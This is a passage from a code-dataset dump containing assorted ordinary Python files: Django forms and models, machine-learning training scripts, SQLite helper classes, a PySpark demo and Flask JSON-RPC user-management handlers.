demote_date < promote_date:\n self.add_error(\n \"demote_date\",\n \"The article cannot be demoted before it has been \"\n \"promoted.\"\n )\n\n return cleaned_data\n\n\nclass MediaForm(forms.Form):\n '''Form to upload a sinlge zip file.'''\n zip_file = forms.FileField(label=\"Zipped Media File\")\n\n def clean_zip_file(self):\n file = self.cleaned_data['zip_file']\n\n if file:\n extension = file.name.split('.')[-1]\n if extension != 'zip':\n raise forms.ValidationError('File Type Is Not .zip')\n return file\n","sub_path":"molo/core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"513599296","text":"#!/usr/bin/env python3\n\n# ================= 代码实现开始 =================\n\n''' 请在这里定义你需要的全局变量 '''\n\n# n个物品,每个物品有体积价值,求若扔掉一个物品后装进给定容量的背包的最大价值\n# n:如题\n# w:长度为n+1的数组,w[i]表示第i个物品的��值(下标从1开始,下标0是一个数字-1,下面同理)\n# v:长度为n+1的数组,v[i]表示第i个物品的体积\n# q:如题\n# qV:长度为q+1的数组,qV[i]表示第i次询问所给出的背包体积\n# qx:长度为q+1的数组,qx[i]表示第i次询问所给出的物品编号\n# 返回值:返回一个长度为q的数组,依次代表相应询问的答案\ndef getAnswer(n, w, v, q, qV, qx):\n ''' 请在这里设计你的算法 '''\n\n# ================= 代码实现结束 =================\n\nv, w, qv, qx = [], [], [], []\nv.append(-1)\nw.append(-1)\nqv.append(-1)\nqx.append(-1)\nn = int(input())\nfor i in range(n):\n a, b = map(int, input().split())\n v.append(a)\n w.append(b)\nq = int(input())\nfor i in range(q):\n a, b = map(int, input().split())\n qv.append(a)\n qx.append(b)\nans = getAnswer(n, w, v, q, qv, qx)\nfor i in ans:\n print(i)\n\n","sub_path":"week3/bag_hard/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"604702826","text":"## autoencoder\r\n\r\n\r\nimport numpy as np\r\n\r\nfrom keras.layers import Input, Dense\r\nfrom keras.models import Model\r\nfrom keras import optimizers\r\nimport data_gather\r\nimport data_gather4\r\nimport matplotlib.pyplot as plt\r\nimport xlwt\r\n#mnist2=data_gather2.ggg()\r\n#mnist1=data_gather.ggg()\r\n\r\n\r\n# Create the model\r\ndef create_model(ndim):\r\n\t# this is our input placeholder\r\n\tinput_img = Input(shape = (ndim, ))\r\n\t\r\n\t# \"encoded\" is the encoded representation of the input\r\n\tencoded1 = Dense(23, activation = 'selu')(input_img)\r\n\tencoded2=Dense(20, activation = 'selu')(encoded1)\r\n\t#encoded3=Dense(200, activation = 'relu')(encoded2)\r\n\t#encoded4=Dense(300, activation = 'relu')(encoded3)\r\n\t#encoded5=Dense(400, activation = 'relu')(encoded4)\r\n\t#encoded6=Dense(500, activation = 'relu')(encoded5)\r\n\t#encoded1 = Dense(6, activation='tanh')(encoded)\r\n\t#encoded2 = Dense(6, activation='tanh')(encoded1)\r\n\t#encoded3 = Dense(encoding_dim, activation='tanh')(encoded2)\r\n #encoded = Dense(64, activation='relu')(encoded)\r\n #encoded = Dense(32, activation='relu')(encoded)\r\n\r\n #decoded = Dense(128, activation='relu')(decoded)\r\n #decoded = Dense(784, activation='sigmoid')(decoded)\r\n\t# \"decoded\" is the lossy reconstruction of the input\r\n\tdecoded1=Dense(15, activation = 'selu')(encoded2)\r\n\tdecoded=Dense(10, activation = 'selu')(decoded1)\r\n\t#decoded3=Dense(300, activation = 'selu')(decoded2)\r\n\t#decoded4=Dense(200, activation = 'selu')(decoded3)\r\n\t#decoded5=Dense(100, activation = 'selu')(decoded4)\r\n\t#decoded6=Dense(50, activation = 'selu')(decoded5)\r\n\t#decoded=Dense(ndim, activation = 'selu')(decoded6)\r\n\t#decoded=Dense(4, activation = 'selu')(decoded1)\r\n\t#decoded = Dense(ndim, activation = 'relu')(decoded1)\r\n\t\r\n\t# this model maps an input to its reconstruction\r\n\tautoencoder = Model(input_img, decoded)\r\n\t\r\n\t# encoder\r\n\tencoder1 = Model(input_img, encoded2)\r\n\tencoder= Model(input_img, [encoded1,encoded2])\r\n #encoder1 = Model(input_img, encoded6)\r\n \r\n\t\r\n\t# compile the autoencoder\r\n\toptimizer=optimizers.Adam(lr=0.0005, epsilon=1e-08, decay=0)\r\n\tautoencoder.compile(loss = 'mean_squared_error', optimizer = optimizer)\r\n\t\r\n\treturn (autoencoder, encoder,encoder1)\r\n\r\n\r\n# Train the model, iterating on the data in batches of batch_size samples\r\ndef train_model(autoencoder, x_train, batch_size, epochs):\r\n\tautoencoder.fit(x_train, x_train, batch_size = batch_size, epochs = epochs, shuffle = True)\r\n\t\r\n\treturn autoencoder\r\n\r\n\r\ndef main():\r\n\t# parameters\r\n\tnsamples = 2325\r\n\tndim = 10\r\n\t#encoding_dim = 200\r\n\tbatch_size = 2325\r\n\tepochs = 8000\r\n\t\r\n\t# generate dummy data\r\n\tx_train=data_gather.ggg()\r\n\t\r\n\t# model\r\n\tautoencoder, encoder,encoder1= create_model(ndim)\r\n\t\r\n\t# train model\r\n\tautoencoder = train_model(autoencoder, x_train, batch_size, epochs)\r\n\t\r\n\t# encoded signal\r\n\tx_test=data_gather4.ggg()\r\n\tencodedsig = encoder1.predict(x_train)\r\n\tencodedsig1=encoder1.predict(x_test)\r\n\r\n\t#encodedsig = autoencoder.predict(x_train)\r\n\t#encodedsig1=x_train\r\n\treturn(encodedsig,encodedsig1)\r\nfrom sklearn.model_selection import KFold\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.svm import NuSVC\r\nimport random\r\n#accur=np.zeros(100)\r\n#for iiii in range(1,100):\r\nx1,yy=main()\r\n\r\n#for index in range(0,9):\r\n # plt.plot(x[:,index])\r\n # plt.plot(y[:,index])\r\n # plt.show()\r\n\r\n\r\nX=np.concatenate((x1,yy))\r\nsize=len(X);\r\ny=np.zeros(shape=[size,1])\r\nfor index in range(0,size):\r\n if (size/2-index)>=0:\r\n y[index,0]=0\r\n else:\r\n y[index,0]=1\r\n\r\nkf = KFold(n_splits=20)\r\nkf.get_n_splits(X)\r\nprint(kf)\r\n\r\nKFold(n_splits=20, random_state=None, shuffle=False)\r\nii=0\r\ndum=np.zeros(len(X))\r\nfor train_index, test_index in kf.split(X):\r\n #print(\"TRAIN:\", train_index, \"TEST:\", test_index)\r\n X_train, X_test = X[train_index], X[test_index]\r\n y_train, y_test = y[train_index], y[test_index]\r\n clf=NuSVC()\r\n clf.fit(X_train,y_train)\r\n NuSVC(cache_size=200, class_weight=None, coef0=0.0,\r\n decision_function_shape=None, degree=1, gamma='auto', kernel='rbf',\r\n max_iter=-1, nu=0.5, probability=False, random_state=None,\r\n shrinking=True, tol=0.001, verbose=False)\r\n y_predict=clf.predict(X_test)\r\n for i in range(0,len(y_predict)-1):\r\n if y_predict[i]==y_test[i]:\r\n dum[ii]=1\r\n ii=ii+1\r\n else:\r\n dum[ii]=0\r\n ii=ii+1\r\nprint(\"Accuracy is\")\r\nprint((np.sum(dum)/len(X))*100,\"%\")\r\n \r\n\r\n \r\n \r\n","sub_path":"autoencoder_svm1.py","file_name":"autoencoder_svm1.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"239515491","text":"import sys\n\n\ndef load_module_from_file(module_name, filepath, sys_path=None):\n if sys_path:\n sys.path.insert(0, sys_path)\n\n import importlib.util\n spec = importlib.util.spec_from_file_location(module_name, filepath)\n cls = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(cls)\n\n if sys_path:\n sys.path.remove(sys_path)\n\n return cls\n\n\ndef datetime_to_str(dt):\n return dt.strftime('%Y-%m-%dT%H:%M')\n\n\ndef merge_dict(existing_dict, new_dict):\n for config_name, config_value in new_dict.items():\n existing_dict[config_name] = config_value\n\n return existing_dict\n\n\ndef crontab_hour_to_utc(crontab_hour, timezone):\n import re\n\n rebuild_hour_items = []\n for hour_item in re.split(r'([-,])', crontab_hour):\n if hour_item in ['-', ',']:\n rebuild_hour_items.append(hour_item)\n else:\n try:\n hour_num = int(hour_item)\n except ValueError:\n # Error, return original\n return crontab_hour\n\n utc_hour = hour_num - timezone\n\n if utc_hour < 0:\n utc_hour = utc_hour + 24\n\n rebuild_hour_items.append(str(utc_hour))\n\n return ''.join(rebuild_hour_items)\n","sub_path":"server/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"509078077","text":"import argparse\nimport copy\nimport time\nfrom os.path import dirname, abspath, join\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nimport misc\nimport shutil\nimport model\nfrom dataloader import URPedestrianDataset,Classifier\n# $ python train.py --muiltGPU 0 1 --classnum 0 --batch_size 128\n# $ python train.py --single 0 --classnum 0 --batch_size 128\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--muiltGPU', nargs='+',type=int, default=[0])\nparser.add_argument('--singleGPU', type=int, default=0)\nparser.add_argument('--classnum', type=int, default=0)\nparser.add_argument('--batch_size',type=int,default=64)\nparser.add_argument('--worker_num',type=int,default=16)\nparser.add_argument('--resume',type=str,default='None')\n\nargs = parser.parse_args()\nfor arg in vars(args):\n print(\"{:>13}:{}\".format(arg, getattr(args, arg)))\n# =============================================\n# Load all used net\n# =============================================\nnet = model.BasicResNetClass()\nif args.resume != 'None':\n parameter=torch.load(args.resume,map_location=lambda storage, loc: storage)\n net.load_state_dict(parameter['state_dict'])\n if 'epoch' in parameter:\n print('starting at epoch: ',parameter['epoch'])\n else:\n print('starting from unknown')\n\nif len(args.muiltGPU) > 1 and torch.cuda.device_count() > 1:\n device = torch.device(\n f\"cuda:{args.muiltGPU[0]}\" if torch.cuda.is_available() else \"cpu\")\n print(\"Let's use\", len(args.muiltGPU), \"GPUs!\")\n batch_size = args.batch_size*len(args.muiltGPU)\n worker_num = args.worker_num\n net = nn.DataParallel(net,device_ids=args.muiltGPU).to(device)\n criterion = nn.CrossEntropyLoss().to(device)\n\n # criterion=nn.DataParallel(nn.CrossEntropyLoss(),device_ids=args.muiltGPU).to(device)\nelse:\n device = torch.device(\n f\"cuda:{args.singleGPU}\" if torch.cuda.is_available() else \"cpu\")\n print(f\"Current using {device}\")\n batch_size = args.batch_size\n worker_num = 16\n net = net.to(device)\n criterion = nn.CrossEntropyLoss().to(device)\n\nprint(f\"batch size: {batch_size}, worker number: {worker_num}\")\n\n\n# =============================================\n# Define a Loss function and optimizer\n# =============================================\n\n\nimport torch.optim as optim\noptimizer = optim.Adam(net.parameters(), lr=0.001, betas=(0.9, 0.99))\n\n\ndef train(loader, model, criterion, optimizer, device, log):\n model.train()\n size_batch, size_data = loader.batch_size, len(loader)\n running_acc_20, iteration_acc_20, iteration_acc_50 = 0, 0, 0\n for index, data in enumerate(loader):\n\n inputs = data['frame'].to(device)\n labels = misc.limit_value_tensor(\n data['noise_label'] - 976, 0, 999).to(device)\n real_label=misc.limit_value_tensor(\n data['steer'] - 976, 0, 999).to(device)\n\n optimizer.zero_grad()\n with torch.set_grad_enabled(True):\n outputs = model(inputs)\n _, predicted = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n acc_50 = misc.accuracy(predicted, real_label, size_batch, 20)\n acc_20 = misc.accuracy(predicted, real_label, size_batch, 50)\n loss.backward()\n optimizer.step()\n running_acc_20 += acc_20\n iteration_acc_20 += acc_20\n iteration_acc_50 += acc_50\n if index % 100 == 99:\n out = 'Iteration: {:>5}/{:<5} {:5} || Acc_20: {:.4f} Acc_50: {:.4f}'.format(\n index, size_data, 'train', iteration_acc_20 / 100, iteration_acc_50/100)\n print(out)\n log.write(out)\n iteration_acc_20, iteration_acc_50 = 0, 0\n return running_acc_20 / size_data\n\n\ndef validate(loader, model, criterion, optimizer, device, log):\n model.eval()\n size_batch, size_data = loader.batch_size, len(loader)\n running_acc_20, iteration_acc_20, iteration_acc_50 = 0, 0, 0\n for index, data in enumerate(loader):\n inputs = data['frame'].to(device)\n labels = misc.limit_value_tensor(\n data['noise_label'] - 976, 0, 999).to(device)\n real_label=misc.limit_value_tensor(\n data['steer'] - 976, 0, 999).to(device)\n optimizer.zero_grad()\n with torch.set_grad_enabled(False):\n outputs = model(inputs)\n _, predicted = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n acc_50 = misc.accuracy(predicted, real_label, size_batch, 20)\n acc_20 = misc.accuracy(predicted, real_label, size_batch, 50)\n running_acc_20 += acc_20\n iteration_acc_20 += acc_20\n iteration_acc_50 += acc_50\n if index % 100 == 99:\n out = 'Iteration: {:>5}/{:<5} {:5} || Acc_20: {:.4f} Acc_50: {:.4f}'.format(\n index, size_data, 'val', iteration_acc_20 / 100, iteration_acc_50/100)\n print(out)\n log.write(out)\n iteration_acc_20, iteration_acc_50 = 0, 0\n return running_acc_20 / size_data\n\n\ndef trainer(dataloader, model, criterion, optimizer, args,num_i, epoch_num=10, checkpoint=0, device=\"cuda:0\"):\n print('======= Start Training =======')\n best_epoch = 0\n best_acc = 0.0\n recorder = open('acc_result.txt', 'w')\n for epoch in range(epoch_num):\n\n time_start = time.time()\n print('Epoch {}/{}'.format(epoch, epoch_num))\n print('=' * 40)\n train_acc = train(dataloader['train'], net,\n criterion, optimizer, device, recorder)\n valid_acc = validate(dataloader['val'], net, criterion,\n optimizer, device, recorder)\n time_elapsed = time.time()-time_start\n print('-' * 10)\n print('complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n output = 'Epoch:{:3} Train Acc={:.3f}, Val Acc={:3f}'.format(\n epoch, train_acc, valid_acc)\n print(output)\n recorder.write(output)\n print('-' * 10)\n\n if valid_acc > best_acc:\n best_acc = valid_acc\n best_epoch = epoch\n is_best = 1\n else:\n is_best = 0\n if checkpoint == 1:\n misc.save_checkpoint({\n 'epoch':epoch+1,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }, is_best, num=args.classnum,filename=\"checkpoint_v{}_{:02}_{:1}.pth.tar\".format(num_i,epoch,args.classnum))\n recorder.write(f'best epoch: {best_epoch}')\n recorder.close()\n\n\n# =============================================\n# 4. Train the network\n# =============================================\n\n# =============================================\n# Split dataset\n# ^^^^^^^^^^^^^\n# Contiguous split\n# train_idx, validation_idx = indices[split:], indices[:split]\n# =============================================\n# if args.dagger\n# dataset_path = join(dirname(dirname(abspath(__file__))), 'data/dataset')\n# dataset = URPedestrianDataset(dataset_path, csv_name='test.csv',classnum=args.classnum,dagger=0)\n#################### DAGGER ==========================================\n# dataset_path = join(dirname(dirname(abspath(__file__))), 'data/dagger')\n# dataset = URPedestrianDataset(dataset_path, csv_name='1.csv' ,classnum=args.classnum,dagger=1)\n\n#============================================================================\n\ndataset_path = join(dirname(dirname(abspath(__file__))), 'data/dataset')\ndataset=Classifier(dataset_path)\nfor i in range(3,8):\n print(f\"====================================================={i}=============================================================================\")\n sampler = misc.split_random_class(dataset.frames,i/10)\n loader = {}\n\n loader = {x: torch.utils.data.DataLoader(dataset,\n batch_size=batch_size, sampler=sampler[x], num_workers=worker_num) for x in\n ['train', 'val']}\n\n print('train batch #:{}, val batch #:{}'.format(\n len(loader['train']), len(loader['val'])))\n print('train #:{}, val #:{}'.format(\n len(loader['train'])*batch_size, len(loader['val'])*batch_size))\n\n\n trainer(loader, net, criterion, optimizer, args,\n epoch_num=50, checkpoint=1, device=device,num_i=i)\n","sub_path":"g7_workspace/model/train_new.py","file_name":"train_new.py","file_ext":"py","file_size_in_byte":8338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"476391364","text":"import sqlite3\nfrom tg_objects.user import User\n\n\nclass Database:\n \"\"\"\n Represents a database, which keeps track of stuff such as users, sent files, etc.\n \"\"\"\n\n def __init__(self):\n # Start a connection with the database\n self.connection = sqlite3.connect('../Data/lonabot.db')\n\n c = self.connection.cursor()\n\n # Ensure that the Users table exist\n c.execute(\"CREATE TABLE IF NOT EXISTS Users\"\n \"(id INTEGER PRIMARY KEY,\"\n \"firstname VARCHAR, lastname VARCHAR, username VARCHAR)\")\n\n # Ensure that the Files table exist\n c.execute(\"CREATE TABLE IF NOT EXISTS FileAudios\"\n \"(id VARCHAR PRIMARY KEY,\"\n \"telegramid VARCHAR, title VARCHAR, artist VARCHAR)\")\n\n self.connection.commit()\n\n # region Users\n\n def close(self):\n \"\"\"\n Closes the connection with the database\n :return:\n \"\"\"\n self.connection.close()\n\n\n def check_user(self, user):\n \"\"\"\n Checks an user in the database. If it's a new user, it's logged on console and adds it\n :param user: The user to check\n \"\"\"\n c = self.connection.cursor()\n c.execute('SELECT * FROM Users WHERE id=?', (user.id,))\n if c.fetchone() is None:\n print('A new user chatted with the bot: {}'.format(user))\n c.execute(\"INSERT INTO Users VALUES (?, ?, ?, ?)\",\n (user.id, user.name, user.last_name, user.username,))\n\n self.connection.commit()\n\n def get_user(self, username):\n \"\"\"\n Retrieves a known user\n :param username: The username of the user\n :return: The user if found, None otherwise\n \"\"\"\n c = self.connection.cursor()\n c.execute('SELECT * FROM Users WHERE username=?', (username,))\n user = c.fetchone()\n if user is not None:\n return User(user)\n\n return None\n\n def user_count(self):\n \"\"\" Returns the currently logged user count \"\"\"\n c = self.connection.cursor()\n c.execute('SELECT COUNT(*) FROM Users')\n return c.fetchone()[0]\n\n # endregion\n\n # region Files\n\n def check_file_audio(self, file_id):\n \"\"\"\n Checks whether an audio file has already be sent to Telegram servers or not\n :param file_id: The ID representing the file. This may be its hash, or other ID\n :return: Telegram's ID of the file if it was sent before; None otherwise\n \"\"\"\n c = self.connection.cursor()\n c.execute('SELECT telegramid FROM FileAudios WHERE id=?', (file_id,))\n result = c.fetchone()\n if result is not None:\n return result[0]\n\n def add_file_audio(self, file_id, telegram_id, title, artist):\n c = self.connection.cursor()\n c.execute('INSERT INTO FileAudios VALUES (?, ?, ?, ?)',\n (file_id, telegram_id, title, artist))\n\n self.connection.commit()\n\n # endregion\n","sub_path":"src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"121614446","text":"#!/usr/bin/env python3\r\n#-*- coding:utf-8 -*-\r\nimport sqlite3\r\nimport os\r\nclass dao(object):\r\n\tdef __init__(self,path=\"lyric.db\"):\r\n\t\tself.db_path=path\r\n\t\tself.conn=sqlite3.connect(self.db_path)\r\n\t\tself.cursor=self.conn.cursor()\r\n\tdef create_table(self):\r\n\t\ttry:\r\n\t\t\tself.cursor.execute(\"create table lyric (id varchar(30) primary key,words varchar(5000),twords varchar(5000))\")\r\n\t\t\tprint(\"successfully create table\")\r\n\t\texcept Exception as e:\r\n\t\t\tprint(e) \r\n\tdef insert_lyric(self,song_id,song_lyric,twords):\r\n\t\t\r\n\t\ttry:\r\n\t\t\tr,v=self.query_db(song_id)\r\n\t\t\tif r==0:\r\n\t\t\t\tself.cursor.execute(\"insert into lyric (id, words,twords) values ( ?,?,?)\",(song_id,song_lyric,twords))\r\n\t\t\t\tself.conn.commit()\r\n\t\texcept Exception as e:\r\n\t\t\tprint(\"insert database error \",e)\r\n\t\t\tprint(song_lyric,twords)\r\n\tdef query_db(self,song_id):\r\n\t\tself.cursor.execute('select * from lyric where id=?', (song_id,))\r\n\t\tvalues = self.cursor.fetchall()\r\n\t\tl=len(values)\r\n\t\tif l==0:return 0,None\r\n\t\telse:\r\n\t\t\treturn 1,values\r\n\tdef close_db(self):\r\n\t\tself.cursor.close()\r\n\t\tself.conn.close()\r\n\tdef test(self):\r\n\t\tprint(self.query_db(song_id))\r\n\t\tself.close_db()\r\n\r\nif __name__ == '__main__':\r\n\td=dao()\r\n\td.insert_lyric(\"1\",\"中国人\",\"123\")\r\n\td.cursor.execute('select * from lyric where id=?',('1',) )\r\n\tvalues = d.cursor.fetchall()\r\n\t[print(i) for i in values]\r\n\t\r\n","sub_path":"netease/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"284073256","text":"from pyspark import SparkContext, SparkConf, SparkFiles\nfrom pyspark.sql import Row, SQLContext\nimport numpy as np\n\nconf = SparkConf().setAppName(\"trying\").setMaster(\"local[*]\")\nsc = SparkContext(conf=conf)\nsqlContext = SQLContext(sc)\n\ncolumns=['name','age','cca','weight']\nname=['tom','alan','david','simon']\nage=[9,3,2,14]\ncca=['basketball','soccer','hockey','badminton']\nweight=[30,40,50,60]\n\nmatrix1 = np.array([name,age,cca,weight])\nprint(matrix1)\nmatrix2 = matrix1.transpose()\nprint(matrix2)\n\nrdd = sc.parallelize(matrix2)\nrdd = rdd.map(lambda x: Row(\n name = str(x[0]),\n age = int(x[1]),\n cca = str(x[2]),\n weight= int(x[3]))\n)\n\ndf = sqlContext.createDataFrame(rdd)\ndf.show()\ndf.printSchema()\ndf=df.select('name','age','weight','cca')\ndf.show()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"376452399","text":"from django.db import models\nfrom django.core.urlresolvers import reverse\nfrom PIL import Image\n\n__author__ = 'Иван Голубых'\n\n\n# #################\n# Группа классов модели для данных страницы примеров работ на JavaScript:\n# #################\nclass ExamplesJs(models.Model):\n ''' Текстовые заголовки уровня
\n '''\n # Порядковый номер объекта на странице:\n ordinal = models.PositiveSmallIntegerField(\n # При blank=True поле может быть пустым\n # (т.е. оно необязательное):\n blank=False,\n # Если строковое поле содержит null=True, это\n # означает, что оно может содержать два возможных\n # “пустых” значения: NULL и пустую строку.\n # Иначе - только пустую строку.\n null=False,\n # Строить ли индекс по этому полю:\n db_index=True,\n # При unique=True значение поля должно быть\n # уникальным.\n unique=True,\n help_text='Порядковый номер объекта на странице',\n verbose_name='Порядковый номер объекта на странице',\n )\n\n # Название проекта:\n name_project = models.CharField(\n max_length=255,\n # При blank=True поле может быть пустым\n # (т.е. оно необязательное):\n blank=False,\n # Если строковое поле содержит null=True, это\n # означает, что оно может содержать два возможных\n # “пустых” значения: NULL и пустую строку.\n # Иначе - только пустую строку.\n null=False,\n # Строить ли индекс по этому полю:\n db_index=False,\n # При unique=True значение поля должно быть\n # уникальным.\n unique=False,\n help_text='Название проекта',\n verbose_name='Название проекта',\n )\n\n # Картинка проекта, если есть.\n image_file = models.ImageField(\n # Куда загружать эти картинки:\n upload_to='examples_js_images/',\n # При blank=True поле может быть пустым\n # (т.е. оно необязательное):\n blank=True,\n verbose_name=\"Картинка проекта\")\n\n # Ссылка на проект в сети:\n net_address = models.CharField(\n max_length=255,\n # При blank=True поле может быть пустым\n # (т.е. оно необязательное):\n blank=True,\n # Если строковое поле содержит null=True, это\n # означает, что оно может содержать два возможных\n # “пустых” значения: NULL и пустую строку.\n # Иначе - только пустую строку.\n null=False,\n # Строить ли индекс по этому полю:\n db_index=False,\n # При unique=True значение поля должно быть\n # уникальным.\n unique=False,\n help_text='Ссылка на проект в сети',\n verbose_name='Ссылка на проект в сети',\n )\n\n # Ссылка на git-репозиторий проекта:\n git_address = models.CharField(\n max_length=255,\n # При blank=True поле может быть пустым\n # (т.е. оно необязательное):\n blank=True,\n # Если строковое поле содержит null=True, это\n # означает, что оно может содержать два возможных\n # “пустых” значения: NULL и пустую строку.\n # Иначе - только пустую строку.\n null=False,\n # Строить ли индекс по этому полю:\n db_index=False,\n # При unique=True значение поля должно быть\n # уникальным.\n unique=False,\n help_text='Ссылка на git-репозиторий проекта',\n verbose_name='Ссылка на git-репозиторий проекта',\n )\n\n # Описание проекта:\n text = models.TextField(\n # При blank=True поле может быть пустым\n # (т.е. оно необязательное):\n blank=False,\n # Если строковое поле содержит null=True, это\n # означает, что оно может содержать два возможных\n # “пустых” значения: NULL и пустую строку.\n # Иначе - только пустую строку.\n null=False,\n # Строить ли индекс по этому полю:\n db_index=False,\n # При unique=True значение поля должно быть\n # уникальным.\n unique=False,\n help_text='Описание проекта',\n verbose_name='Описание проекта',\n )\n\n def __str__(self):\n return '{} - {}'.format(self.ordinal, self.text)\n\n def get_absolute_url(self):\n return reverse('admin_examples_work_js')\n\n def delete(self, *args, **kwargs):\n if self.image_file:\n # До удаления записи получаем необходимую информацию\n storage, filepath = self.image_file.storage, self.image_file.path\n # Потом удаляем сам файл\n storage.delete(filepath)\n # Удаляем запись в БД (объект)\n super(__class__, self).delete(*args, **kwargs)\n\n def save(self, *args, **kwargs):\n # Максимальный размер изображения по большей стороне\n _MAX_SIZE = 286\n # Проверяю, есть ли в БД уже этот объект (радактируем старое или\n # создаём новое?):\n old_obj = False\n try:\n old_obj = __class__.objects.get(pk=self.pk)\n except Exception:\n pass\n # Сначала - обычное сохранение\n super(__class__, self).save(*args, **kwargs)\n if old_obj and old_obj.image_file\\\n and ((not self.image_file) or\n (old_obj.image_file.path != self.image_file.path)\n ):\n # удаляю старый файл, если он был стёрт или обновлён на новый:\n storage = old_obj.image_file.storage\n filepath = old_obj.image_file.path\n storage.delete(filepath)\n # Если добавиласть новая картинка или изменилась старая, то создаю\n # уменьшенную копию:\n if self.image_file\\\n and (not old_obj or\n not old_obj.image_file or\n (old_obj.image_file and\n old_obj.image_file.path != self.image_file.path\n )\n ):\n filepath = self.image_file.path\n width = self.image_file.width\n height = self.image_file.height\n max_size = max(width, height)\n image_file = Image.open(filepath)\n # Может, и не надо ничего менять?\n if max_size > _MAX_SIZE:\n # resize - безопасная функция, она создаёт новый объект, а не\n # вносит изменения в исходный, поэтому так\n image_file = image_file.\\\n resize((round(width / max_size * _MAX_SIZE),\n round(height / max_size * _MAX_SIZE)),\n Image.ANTIALIAS\n )\n # И не забыть сохраниться\n image_file.save(filepath)\n# #################\n# Окончание группы классов модели для страницы примеров работ на JavaScript.\n# #################\n","sub_path":"portfolio_django_2017/app_main/models_examples_work_js.py","file_name":"models_examples_work_js.py","file_ext":"py","file_size_in_byte":8817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"552982274","text":"from application import jsonrpc\nfrom flask import render_template, g, request, flash, redirect, url_for, json, jsonify\nfrom flask.json import JSONEncoder\nfrom .models import Users, Department, db\nfrom sqlalchemy import or_\nimport hashlib\n\n\n@jsonrpc.method(\"User.list(username=String)\")\ndef user_list(username):\n \"\"\"\n 全部用户数据,现在是方便开发,所以将全部数据返回\n 实际开发中,用户第一次查看公司应该只返回部门,然后点击对应部门再查询对应部门的员工信息。\n 这么做的好处是,每次查询只需要用到部门表,极大提高了响应前端请求,减少数据库的压力\n :param username: 确认前端是否用户已登录(前端已校验,这么做是为了双重校验)\n :return: 返回除密码外的全部用户信息\n \"\"\"\n # 校验用户是否存在\n username = username[\"username\"]\n user_jc = Users.query.filter(Users.username == username).all()\n if len(user_jc) <= 0:\n return {\"message\": \"fail\", \"error\": \"无此用户\"}\n\n \"\"\"用户列表,过滤已删除用户\n show 是否显示的用户\n deleted 是否删除用户\n desc 按照什么排序,下面是sort如果没有则按id排序\n 你也可以用简单的:user_list_jc = Users.query.all()\n \"\"\"\n user_list_jc = Users.query.filter(\n Users.is_show == True,\n Users.is_deleted == False\n ).order_by(\n db.desc(Users.sort),\n db.desc(Users.id)\n ).all()\n data = []\n for user in user_list_jc:\n \"\"\"遍历对象信息并提取出来,__to_dict__是讲对象转化成字典的方法\n 这里的filter是一种传参搜索的方法,还有filter_by则是赋值搜索,一般建议用前者,后者用or等搜索会比较麻烦\n \"\"\"\n item = user.__to_dict__(['id', \"username\", 'mobile', 'department_id', 'create_time', 'update_time'])\n department_jc = Department.query.filter(Department.id == item[\"department_id\"]).all()\n for user_department in department_jc:\n \"\"\"将部门名称提取出来放到列表\"\"\"\n one_department_dic = user_department.__to_dict__(['name'])\n item[\"department_name\"] = one_department_dic[\"name\"]\n data.append(item)\n print(\"user_list_Data-------->\", data)\n return data\n\n\n@jsonrpc.method(\"Search.user(username=String)\")\ndef search_user(username):\n \"\"\"\n 个人用户列表,未做密码检查\n :param username: 用户名\n :return: 返回用户个人信息\n \"\"\"\n username = username[\"username\"]\n user_jc = Users.query.filter(Users.username == username).all()\n data = []\n for user in user_jc:\n item = user.__to_dict__(['id', \"username\", 'mobile', 'department_id', 'create_time', 'update_time'])\n department_jc = Department.query.filter(Department.id == item[\"department_id\"]).all()\n # print(\"department1--->\", department_jc)\n for user_department in department_jc:\n \"\"\"将部门名称提取出来放到列表\"\"\"\n user_department_item = user_department.__to_dict__(['name'])\n item[\"department_name\"] = user_department_item[\"name\"]\n data.append(item)\n print(\"search_user_data------>\", data)\n return data\n\n\n@jsonrpc.method(\"Add.user(data=String)\")\ndef add_user(data):\n \"\"\"\n 添加用户\n :param data:传过来的data是字典类型的数据\n :return: 返回成功失败的结果\n 为了数据更安全你可以增加事务回滚(一般在订单付款跟第三方支付的时候设置)\n try:\n # 这里写sql语句组 一旦发生异常执行rollback() 相当于什么都没���行\n connect.commit()\n return 'OK'\n except Exception as error:\n print(error)\n connect.rollback() # 发生异常时执行回滚\n return 'Err'\n \"\"\"\n user_list_jc = Users.query.filter(\n Users.is_show == True,\n Users.is_deleted == False\n ).order_by(\n db.desc(Users.sort),\n db.desc(Users.id)\n ).all()\n username_list = []\n department_list = []\n department_dic = {}\n for user in user_list_jc:\n user_item = user.__to_dict__(['id', \"username\"])\n username_list.append(user_item[\"username\"])\n\n \"\"\"获取部门名称\"\"\"\n department_list_jc = 